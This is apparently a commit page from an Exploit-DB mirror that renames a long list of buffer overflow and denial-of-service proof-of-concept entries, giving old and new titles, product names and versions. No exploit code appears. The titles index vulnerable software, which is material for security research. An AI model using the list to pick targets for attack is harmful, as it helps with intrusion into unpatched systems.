bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-09

Browse source 
26 changes to exploits/shellcodes

Need for Speed 2 - Remote Client Buffer Overflow
Need for Speed 2 - Remote Client Buffer Overflow (PoC)

Red Faction 1.20 - Server Reply Remote Buffer Overflow
Red Faction 1.20 - Server Reply Remote Buffer Overflow (PoC)

Medal of Honor - Remote Buffer Overflow
Medal of Honor - Remote Buffer Overflow (PoC)

Monolith Games - Local Buffer Overflow
Monolith Games - Local Buffer Overflow (PoC)

BaSoMail - Multiple Buffer Overflow Denial of Service Vulnerabilities
BaSoMail - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities

Orbz Game 2.10 - Remote Buffer Overflow
Orbz Game 2.10 - Remote Buffer Overflow (PoC)

Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow
Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow (PoC)

KNet Web Server 1.04c - Buffer Overflow Denial of Service
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)

ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash
ProRat Server 1.9 (Fix-2) - Buffer Overflow / Crash (PoC)

Mozilla Products - 'Host:' Buffer Overflow Denial of Service String
Mozilla Products - 'Host:' Buffer Overflow (Denial of Service) (PoC) String

Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service
Virtools Web Player 3.0.0.100 - Buffer Overflow (Denial of Service) (PoC)

FlatFrag 0.3 - Buffer Overflow / Denial of Service
FlatFrag 0.3 - Buffer Overflow (Denial of Service) (PoC)

zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service
zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC)

TinyFTPD 1.4 - 'USER' Remote Buffer Overflow Denial of Service
TinyFTPD 1.4 - 'USER' Remote Buffer Overflow (Denial of Service) (PoC)

Genecys 0.2 - Buffer Overflow / NULL pointer Denial of Service
Genecys 0.2 - Buffer Overflow / NULL Pointer (Denial of Service)

PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow Denial of Service
PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow (Denial of Service) (PoC)

FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service
FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow (Denial of Service) (PoC)

Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)

TFTP Server 1.3 - Remote Buffer Overflow Denial of Service
TFTP Server 1.3 - Remote Buffer Overflow (Denial of Service) (PoC)

LeadTools Raster - Dialog File_D Object Remote Buffer Overflow
LeadTools Raster - Dialog File_D Object Remote Buffer Overflow (PoC)

LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow
LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)

Xserver 0.1 Alpha - POST Remote Buffer Overflow
Xserver 0.1 Alpha - 'POST' Remote Buffer Overflow (PoC)

Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow
Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow (PoC)

QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow
QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow (PoC)

Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow / Denial of Service
Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow (Denial of Service) (PoC)

Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service
Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow (Denial of Service) (PoC)

Google Picasa 3.5 - Local Buffer Overflow (Denial of Service)
Google Picasa 3.5 - Local Buffer Overflow (Denial of Service) (PoC)
Printoxx - Local Buffer Overflow
Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)
Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)

Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service
Apollo Player 37.0.0.0 - '.aap' Buffer Overflow (Denial of Service) (PoC)

Switch Sound File Converter - '.mpga' Buffer Overflow Denial of Service
Switch Sound File Converter - '.mpga' Buffer Overflow (Denial of Service) (PoC)
Wireshark 1.2.5 - LWRES getaddrbyname Stack Buffer Overflow
Xerox Workcenter 4150 - Remote Buffer Overflow
Wireshark 1.2.5 - 'LWRES getaddrbyname' Stack Buffer Overflow (PoC)
Xerox Workcenter 4150 - Remote Buffer Overflow (PoC)

iPhone / iTouch FtpDisc 1.0 - Buffer Overflow / Denial of Service
iPhone / iTouch FtpDisc 1.0 - Buffer Overflow (Denial of Service) (PoC)

Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow
Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow (PoC)
Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)
FontForge - '.BDF' Font File Stack Buffer Overflow
Mocha LPD 1.9 - Remote Buffer Overflow (Denial of Service) (PoC)
FontForge - '.BDF' Font File Stack Buffer Overflow (PoC)

Multiple Vendor AgentX++ - Stack Buffer Overflow
Multiple Vendor AgentX++ - Stack Buffer Overflow (PoC)

Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow
Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow (PoC)

Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow
Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow (PoC)

FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow
FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow (PoC)

LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow
LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow (PoC)

Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow
Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow (PoC)

Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow
Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow (PoC)

Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow
Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow (PoC)

Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)
Hanso Player 1.4.0.0 - 'Skinfile' Buffer Overflow (Denial of Service)
Real player 14.0.2.633 - Buffer Overflow / Denial of Service
GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service
Real player 14.0.2.633 - Buffer Overflow (Denial of Service) (PoC)
GOM Media Player 2.1.6.3499 - Buffer Overflow (Denial of Service) (PoC)

BulletProof FTP Client 2010 - Buffer Overflow
BulletProof FTP Client 2010 - Buffer Overflow (PoC)

KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (PoC)
KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC)

Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows
Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows (PoC)

CSF Firewall - Buffer Overflow
CSF Firewall - Buffer Overflow (PoC)

Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH)
Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH) (PoC)

Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service
Edraw Diagram Component 5 - ActiveX Buffer Overflow (Denial of Service) (PoC)

Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow
Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)

Asterisk - 'ast_parse_digest()' Stack Buffer Overflow
Asterisk - 'ast_parse_digest()' Stack Buffer Overflow (PoC)

GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow
GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow (PoC)

Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow
Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow (PoC)

Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow Denial of Service
Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow (Denial of Service) (PoC)

Lattice Diamond Programmer 1.4.2 - Buffer Overflow
Lattice Diamond Programmer 1.4.2 - Buffer Overflow (PoC)
Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - Imapd Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - LDAP Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - IMonitor Buffer Overflow Denial of Service
Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0 - Imapd Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0 - LDAP Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0 - IMonitor Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow (Denial of Service) (PoC)

Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service
Netscape Enterprise Server 3.6 - SSL Buffer Overflow (Denial of Service) (PoC)

Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow
Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow (PoC)

Gene6 G6 FTP Server 2.0 - Buffer Overflow Denial of Service
Gene6 G6 FTP Server 2.0 - Buffer Overflow (Denial of Service) (PoC)

RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow
RedHat Linux 6.x - X Font Server Buffer Overflow (Denial of Service)

Computalynx CProxy Server 3.3 SP2 - Buffer Overflow Denial of Service
Computalynx CProxy Server 3.3 SP2 - Buffer Overflow (Denial of Service) (PoC)

Cerberus FTP Server 1.x - Buffer Overflow Denial of Service
Cerberus FTP Server 1.x - Buffer Overflow (Denial of Service) (PoC)

Microsoft SQL Server 2000 - SQLXML Buffer Overflow
Microsoft SQL Server 2000 - 'SQLXML' Buffer Overflow (PoC)

Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow
Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow (PoC)

Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow
Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow (PoC)

Hotfoon Dialer 4.0 - Buffer Overflow
Hotfoon Dialer 4.0 - Buffer Overflow (PoC)

IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service
IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)

Linksys Devices 1.42/1.43 - GET Buffer Overflow
Linksys Devices 1.42/1.43 - 'GET' Buffer Overflow (PoC)

iCal 3.7 - Remote Buffer Overflow
iCal 3.7 - Remote Buffer Overflow (PoC)

Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow
Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow (PoC)

Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow
Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow (PoC)

Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow
Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow (PoC)

Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow
Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow (PoC)

Zoner Photo Studio 15 b3 - Buffer Overflow
Zoner Photo Studio 15 b3 - Buffer Overflow (PoC)

Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow
Novell Netware Enterprise Web Server 5.1/6.0 - 'CGI2Perl.NLM' Buffer Overflow (PoC)

IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow
IBM U2 UniVerse 10.0.0.9 - 'uvrestore' Buffer Overflow (PoC)

Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow
Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow (PoC)

NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow
NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow (PoC)

myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow
myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow (PoC)

EffectOffice Server 2.6 - Remote Service Buffer Overflow
EffectOffice Server 2.6 - Remote Service Buffer Overflow (PoC)

Surfboard HTTPd 1.1.9 - Remote Buffer Overflow
Surfboard HTTPd 1.1.9 - Remote Buffer Overflow (PoC)

1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow
1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow (PoC)

Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow
Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow (PoC)

Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow
Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow (PoC)

Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow
Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)

DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow
DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)

VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow
VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC)

aGSM 2.35 Half-Life Server - Info Response Buffer Overflow
aGSM 2.35 Half-Life Server - Info Response Buffer Overflow (PoC)

cURL - Buffer Overflow
cURL - Buffer Overflow (PoC)

TagScanner 5.1 - Stack Buffer Overflow
TagScanner 5.1 - Stack Buffer Overflow (PoC)

Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow
Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow (PoC)

Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)

QwikMail 0.3 - HELO Command Buffer Overflow
QwikMail 0.3 - 'HELO' Buffer Overflow (PoC)

NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow (PoC)

Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities
Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities (PoC)

Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow
Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow (PoC)

AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow
AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow (PoC)

Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service
Serva 32 TFTP 2.1.0 - Buffer Overflow (Denial of Service) (PoC)

Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow
Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow (PoC)

Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow
Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow (PoC)

PlanetDNS PlanetFileServer - Remote Buffer Overflow
PlanetDNS PlanetFileServer - Remote Buffer Overflow (PoC)

Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow
Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow (PoC)

Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow
Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (PoC)

LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow
LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow (PoC)

VbsEdit 5.9.3 - '.smi' Buffer Overflow
VbsEdit 5.9.3 - '.smi' Buffer Overflow (PoC)

Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow
Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)

AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow
AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow (PoC)

DSocks 1.3 - 'Name' Buffer Overflow
DSocks 1.3 - 'Name' Buffer Overflow (PoC)

IcoFX 2.5.0.0 - '.ico' Buffer Overflow
IcoFX 2.5.0.0 - '.ico' Buffer Overflow (PoC)
Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow
Microsoft Windows XP - 'cmd.exe' Buffer Overflow
Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow (PoC)
Microsoft Windows XP - 'cmd.exe' Buffer Overflow (PoC)

Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities
Packeteer PacketShaper 8.0 - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities

Bochs 2.3 - Buffer Overflow / Denial of Service
Bochs 2.3 - Buffer Overflow (Denial of Service) (PoC)

Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow
Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow (PoC)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (1)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (2)

T1lib - intT1_Env_GetCompletePath Buffer Overflow
T1lib - 'intT1_Env_GetCompletePath' Buffer Overflow (PoC)

Foxmail Email Client 6.5 - 'mailto' Buffer Overflow
Foxmail Email Client 6.5 - 'mailto' Buffer Overflow (PoC)
Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow
Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow Denial of Service
Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow (PoC)
Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow (Denial of Service) (PoC)

Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow
Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow (PoC)

Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow
Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow (PoC)

MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow
MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow (PoC)

MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow
MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow (PoC)

Trend Micro OfficeScan - Buffer Overflow / Denial of Service
Trend Micro OfficeScan - Buffer Overflow (Denial of Service) (PoC)

ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow
ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow (PoC)

Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow
Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow (PoC)

Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow
Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow (PoC)

NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow
NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow (PoC)

ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow
ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow (PoC)

A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow
A10 Networks ACOS 2.7.0-P2 (Build 53) - Buffer Overflow (PoC)

Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow
Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow (PoC)

Jzip - Buffer Overflow (SEH Unicode) (Denial of Service)
Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)

Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow
Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow (PoC)

BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow
BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow (PoC)

Adobe Flash Player 10.0.22 and AIR - URI Parsing Heap Buffer Overflow
Adobe Flash Player 10.0.22 / AIR - URI Parsing Heap Buffer Overflow (PoC)

Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow
Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow (PoC)

Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow
Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow (PoC)

Xerox WorkCentre - PJL Daemon Buffer Overflow
Xerox WorkCentre - PJL Daemon Buffer Overflow (PoC)

Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow
Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow (PoC)

Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow
Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow (PoC)

Mocha W32 LPD 1.9 - Remote Buffer Overflow
Mocha W32 LPD 1.9 - Remote Buffer Overflow (PoC)

Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)

BulletProof FTP Client 2010 - Buffer Overflow (SEH)
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)

Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow
Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow (PoC)

D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow
D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC)

HTML Help Workshop 1.4 - Buffer Overflow (SEH)
HTML Help Workshop 1.4 - Buffer Overflow (SEH) (PoC)

Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite

TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow
TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow (PoC)
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC)

G-WAN 2.10.6 - Buffer Overflow / Denial of Service
G-WAN 2.10.6 - Buffer Overflow (Denial of Service) (PoC)

Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service
Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow (Denial of Service) (PoC)

TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow
TestDisk 6.14 - 'Check_OS2MB' Stack Buffer Overflow (PoC)

ZOC SSH Client - Buffer Overflow (SEH)
ZOC SSH Client - Buffer Overflow (SEH) (PoC)

WebDrive 12.2 (B4172) - Buffer Overflow
WebDrive 12.2 (B4172) - Buffer Overflow (PoC)

PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH)
PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH) (PoC)

Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow
Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow (PoC)
IKEView.exe Fox Beta 1 - Stack Buffer Overflow
IKEView.exe R60 - Stack Buffer Overflow
IKEView.exe Fox Beta 1 - Stack Buffer Overflow (PoC)
IKEView.exe R60 - Stack Buffer Overflow (PoC)

Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow
Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow (PoC)

Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow
Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow (PoC)
LanSpy 2.0.0.155 - Buffer Overflow
LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow
Last PassBroker 3.2.16 - Stack Buffer Overflow
LanSpy 2.0.0.155 - Buffer Overflow (PoC)
LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow (PoC)
Last PassBroker 3.2.16 - Stack Buffer Overflow (PoC)

Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow
Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow (PoC)
TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)
TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow
TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow
TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH) (PoC)
TECO TP3-PCLINK 2.1 - '.tpc' Handling Buffer Overflow (PoC)
TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow (PoC)
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - '_FXCLI_SetConfFileChunk' Stack Buffer Overflow (PoC)
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - '_FXCLI_GetConfFileChunk' Stack Buffer Overflow (PoC)

Advanced Encryption Package Buffer Overflow - Denial of Service
Advanced Encryption Package - Buffer Overflow (Denial of Service) (PoC)

InfraRecorder - '.m3u' File Buffer Overflow
InfraRecorder - '.m3u' File Buffer Overflow (PoC)

Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution
Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution (PoC)
Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow
yTree 1.94-1.1 - Local Buffer Overflow
Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow (PoC)
yTree 1.94-1.1 - Local Buffer Overflow (PoC)

NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow
NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow (PoC)

CyberCop Scanner Smbgrind 5.5 - Buffer Overflow
CyberCop Scanner Smbgrind 5.5 - Buffer Overflow (PoC)
STIMS Buffer 1.1.20 - Buffer Overflow (SEH) (Denial of Service)
STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service
STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC)
STIMS Cutter 1.1.3.20 - Buffer Overflow (Denial of Service) (PoC)

4digits 1.1.4 - Local Buffer Overflow
4digits 1.1.4 - Local Buffer Overflow (PoC)

Websockify (C Implementation) 0.8.0 - Buffer Overflow
Websockify (C Implementation) 0.8.0 - Buffer Overflow (PoC)

Google Android - '/system/bin/sdcard' Stack Buffer Overflow
Google Android - '/system/bin/sdcard' Stack Buffer Overflow (PoC)

Oracle Orakill.exe 11.2.0 - Buffer Overflow
Oracle Orakill.exe 11.2.0 - Buffer Overflow (PoC)

Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow
Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow (PoC)
Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow
Core FTP LE 2.2 - Path Field Local Buffer Overflow
Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow (PoC)
Core FTP LE 2.2 - Path Field Local Buffer Overflow (PoC)

Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow
Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (PoC)

ConQuest DICOM Server 1.4.17d - Stack Buffer Overflow
ConQuest DICOM Server 1.4.17d - Stack Buffer (PoC)

